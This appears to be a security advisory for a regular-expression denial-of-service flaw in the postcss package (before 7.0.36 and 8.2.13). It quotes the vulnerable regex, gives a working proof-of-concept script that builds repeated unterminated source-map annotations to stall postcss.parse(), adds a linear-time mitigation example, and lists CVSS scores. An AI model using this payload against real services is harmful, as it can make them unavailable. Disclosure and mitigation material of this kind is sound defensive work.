The package postcss before 8.2.13 is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and…
snyk·CWE-1333·Published 2021-04-26
The package postcss before 8.2.13 is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerability stems mainly from the sub-pattern `\/\*\s* sourceMappingURL=(.*)` in the affected regexes.
Versions of the package postcss before 7.0.36, or between 8.0.0 and 8.2.13, are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerability stems mainly from the sub-pattern

```regex
\/\*\s* sourceMappingURL=(.*)
```

### PoC

```js
var postcss = require("postcss")

// Builds a stylesheet with n repeated, unterminated annotation prefixes.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}
```

```js
// Baseline: a well-formed annotation parses normally.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time postcss.parse() on inputs of growing size (every 1000th n).
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
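On the mitigation side, the annotation lookup does not need a backtracking regex at all. The following is an added example, not code from postcss or from the advisory: `findAnnotationURL` and `MARKER` are hypothetical names, and the scanner ignores CSS string literals for brevity. It reads each byte a bounded number of times and stops at the first unterminated comment, so the repeated-prefix input shape from the PoC costs linear time.

```javascript
// Added example: linear-time lookup of the last source-map annotation comment.
// findAnnotationURL and MARKER are hypothetical names, not postcss APIs.
const MARKER = "# sourceMappingURL=";

function findAnnotationURL(css) {
  let last = null;
  let pos = 0;
  while (pos < css.length) {
    const open = css.indexOf("/*", pos);
    if (open === -1) break;
    // Skip whitespace after "/*" (the \s* part of the page's sub-pattern).
    let j = open + 2;
    while (j < css.length && /\s/.test(css[j])) j++;
    const close = css.indexOf("*/", j);
    // An unterminated comment means no later "/*" can be closed either:
    // stop here instead of retrying the search from every following prefix.
    if (close === -1) break;
    if (css.startsWith(MARKER, j)) {
      last = css.slice(j + MARKER.length, close).trim();
    }
    pos = close + 2; // resume after the comment; nothing is rescanned
  }
  return last;
}

// Constructed inputs: one well-formed annotation, and the unterminated
// repeated-prefix shape that the page's PoC feeds to postcss.parse().
const benign = "a{}/*# sourceMappingURL=a.css.map */";
const hostile = "a{}" + "/*# sourceMappingURL=".repeat(200000) + "!";

console.log(findAnnotationURL(benign));
const t0 = Date.now();
console.log(findAnnotationURL(hostile), (Date.now() - t0) + " ms");
```

Where upgrading to a fixed release is not yet possible, the same idea applies to any pre-filter placed in front of the parser: locate delimiters with `indexOf` rather than a `(.*)` capture followed by a literal.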
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 2.0 | Primary | NVD | 5.0 | 10.0 | 2.9 | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| 3.1 | Primary | NVD | 7.5 | 3.9 | 3.6 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| 3.1 | Primary | cve.org | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
| 3.1 | Secondary | GHSA | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
| 3.1 | Secondary | NVD | 5.3 | 3.9 | 1.4 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |